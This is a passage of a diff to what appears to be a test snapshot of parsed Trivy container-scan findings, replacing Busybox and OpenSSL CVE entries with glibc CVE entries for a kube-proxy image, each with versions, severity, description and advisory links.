+ "https://www.cve.org/CVERecord?id=CVE-2020-10029", ], }, "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the nvalloc function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "The GNU C Library (aka glibc or libc6) before 2.32 could overflow an on-stack buffer during range reduction if an input to an 80-bit long double function contains a non-canonical bit pattern, a seen when passing a 0x5d414141414141410000 value to sinl on x86 targets. This is related to sysdeps/ieee754/ldbl-96/e_rem_pio2l.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the nvalloc()", + "name": "glibc: stack corruption from crafted input in cosl, sinl, sincosl, and tanl functions", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42386", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42386", + "value": "https://avd.aquasec.com/nvd/cve-2020-10029", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42386", + "value": "https://access.redhat.com/security/cve/CVE-2020-10029", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://linux.oracle.com/cve/CVE-2020-10029.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://linux.oracle.com/errata/ELSA-2021-0348.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42386", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42386", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.31.1-r22", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2022-28391", - "installedVersion": "1.31.1-r16", - "packageName": "busybox", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-28391", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28391", - "https://git.alpinelinux.org/aports/plain/main/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch", - "https://git.alpinelinux.org/aports/plain/main/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch", - "https://gitlab.alpinelinux.org/alpine/aports/-/issues/13661", - "https://nvd.nist.gov/vuln/detail/CVE-2022-28391", - "https://www.cve.org/CVERecord?id=CVE-2022-28391", - ], - }, - "category": "Vulnerability", - "description": "BusyBox through 1.35.0 allows remote attackers to execute arbitrary code if netstat is used to print a DNS PTR record's value to a VT compatible terminal. Alternatively, the attacker could choose to change the terminal's colors.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "busybox: remote attackers may execute arbitrary code if netstat is used", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-28391", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-28391", + "value": "https://security.gentoo.org/glsa/202006-04", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28391", + "value": "https://security.netapp.com/advisory/ntap-20200327-0003/", }, { "type": "URL", - "value": "https://git.alpinelinux.org/aports/plain/main/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", }, { "type": "URL", - "value": "https://git.alpinelinux.org/aports/plain/main/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", }, { "type": "URL", - "value": "https://gitlab.alpinelinux.org/alpine/aports/-/issues/13661", + "value": "https://ubuntu.com/security/notices/USN-4416-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-28391", + "value": "https://usn.ubuntu.com/4416-1/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-28391", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-10029", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42374", - "installedVersion": "1.31.1-r16", - "packageName": "busybox", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-27618", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42374", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42374", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42374", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42374", + "https://access.redhat.com/security/cve/CVE-2020-27618", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", + "https://linux.oracle.com/cve/CVE-2020-27618.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210401-0006/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5768-1", + "https://www.cve.org/CVERecord?id=CVE-2020-27618", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", ], }, "category": "Vulnerability", - "description": "An out-of-bounds heap read in Busybox's unlzma applet leads to information leak and denial of service when crafted LZMA-compressed input is decompressed. This can be triggered by any applet/format that", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid multi-byte input sequences in IBM1364, IBM1371, IBM1388, IBM1390, and IBM1399 encodings, fails to advance the input state, which could lead to an infinite loop in applications, resulting in a denial of service, a different vulnerability from CVE-2016-10228.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: out-of-bounds read in unlzma applet leads to information leak and denial of service when crafted LZMA-compressed input is decompressed", + "name": "glibc: iconv when processing invalid multi-byte input sequences fails to advance the input state, which could result in an infinite loop", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42374", + "value": "https://avd.aquasec.com/nvd/cve-2020-27618", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42374", + "value": "https://access.redhat.com/security/cve/CVE-2020-27618", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42374", + "value": "https://linux.oracle.com/cve/CVE-2020-27618.html", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42374", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://security.netapp.com/advisory/ntap-20210401-0006/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42374", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5310-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5768-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-27618", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, ], "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.1.1l-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-3711", - "installedVersion": "1.1.1g-r0", - "packageName": "libcrypto1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-4756", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/26/2", - "https://access.redhat.com/security/cve/CVE-2021-3711", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", - "https://github.com/advisories/GHSA-5ww6-px42-wc85", - "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", - "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", - "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", - "https://security.gentoo.org/glsa/202209-02", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20210827-0010/", - "https://security.netapp.com/advisory/ntap-20211022-0003/", - "https://ubuntu.com/security/notices/USN-5051-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3711", - "https://www.debian.org/security/2021/dsa-4963", - "https://www.openssl.org/news/secadv/20210824.txt", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-16", - "https://www.tenable.com/security/tns-2022-02", + "http://cxib.net/stuff/glob-0day.c", + "http://securityreason.com/achievement_securityalert/89", + "http://securityreason.com/exploitalert/9223", + "https://access.redhat.com/security/cve/CVE-2010-4756", + "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "https://www.cve.org/CVERecord?id=CVE-2010-4756", ], }, "category": "Vulnerability", - "description": "In order to decrypt SM2 encrypted data an application is expected to call the API function EVP_PKEY_decrypt(). Typically an application will call this function twice. The first time, on entry, the "out" parameter can be NULL and, on exit, the "outlen" parameter is populated with the buffer size required to hold the decrypted plaintext. The application can then allocate a sufficiently sized buffer and call EVP_PKEY_decrypt() again, but this time passing a non-NULL value for the "out" parameter. A bug in the implementation of the SM2 decryption code means that the calculation of the buffer size required to hold the plaintext returned by the first call to EVP_PKEY_decrypt() can be smaller than the actual size required by the second call. This can lead to a buffer overflow when EVP_PKEY_decrypt() is called by the application a second time with a buffer that is too small. A malicious attacker who is able present SM2 content for decryption to an application could cause attacker chosen data to overflow the buffer by up to a maximum of 62 bytes altering the contents of other data held after the buffer, possibly changing application behaviour or causing the application to crash. The location of the buffer is application dependent but is typically heap allocated. Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: SM2 Decryption Buffer Overflow", + "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3711", + "value": "https://avd.aquasec.com/nvd/cve-2010-4756", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", + "value": "http://cxib.net/stuff/glob-0day.c", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3711", + "value": "http://securityreason.com/achievement_securityalert/89", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "value": "http://securityreason.com/exploitalert/9223", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", + "value": "https://access.redhat.com/security/cve/CVE-2010-4756", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-5ww6-px42-wc85", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-20796", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "http://www.securityfocus.com/bid/107160", + "https://access.redhat.com/security/cve/CVE-2018-20796", + "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "https://security.netapp.com/advisory/ntap-20190315-0002/", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2018-20796", + ], + }, + "category": "Vulnerability", + "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", + "value": "https://avd.aquasec.com/nvd/cve-2018-20796", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", + "value": "http://www.securityfocus.com/bid/107160", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-02", + "value": "https://access.redhat.com/security/cve/CVE-2018-20796", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", + "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211022-0003/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-1", + "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3711", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4963", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010022", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-1010022", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "https://ubuntu.com/security/CVE-2019-1010022", + "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: stack guard protection bypass", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210824.txt", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-16", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-02", + "value": "https://ubuntu.com/security/CVE-2019-1010022", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1j-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-23840", - "installedVersion": "1.1.1g-r0", - "packageName": "libcrypto1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010023", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-23840", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23840", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", - "https://github.com/advisories/GHSA-qgm6-9472-pwq7", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", - "https://linux.oracle.com/cve/CVE-2021-23840.html", - "https://linux.oracle.com/errata/ELSA-2021-9561.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2021-23840", - "https://rustsec.org/advisories/RUSTSEC-2021-0057.html", - "https://security.gentoo.org/glsa/202103-03", - "https://security.netapp.com/advisory/ntap-20210219-0009/", - "https://ubuntu.com/security/notices/USN-4738-1", - "https://ubuntu.com/security/notices/USN-5088-1", - "https://www.cve.org/CVERecord?id=CVE-2021-23840", - "https://www.debian.org/security/2021/dsa-4855", - "https://www.openssl.org/news/secadv/20210216.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-03", - "https://www.tenable.com/security/tns-2021-09", - "https://www.tenable.com/security/tns-2021-10", + "http://www.securityfocus.com/bid/109167", + "https://access.redhat.com/security/cve/CVE-2019-1010023", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010023", + "https://www.cve.org/CVERecord?id=CVE-2019-1010023", ], }, "category": "Vulnerability", - "description": "Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissable length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: integer overflow in CipherUpdate", + "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-23840", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-23840", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23840", + "value": "http://www.securityfocus.com/bid/109167", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-qgm6-9472-pwq7", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", }, { "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", + "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-23840.html", + "value": "https://ubuntu.com/security/CVE-2019-1010023", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9561.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010024", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "http://www.securityfocus.com/bid/109162", + "https://access.redhat.com/security/cve/CVE-2019-1010024", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010024", + "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: ASLR bypass using cache of thread stack and heap", + "references": [ { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "http://www.securityfocus.com/bid/109162", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23840", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0057.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202103-03", + "value": 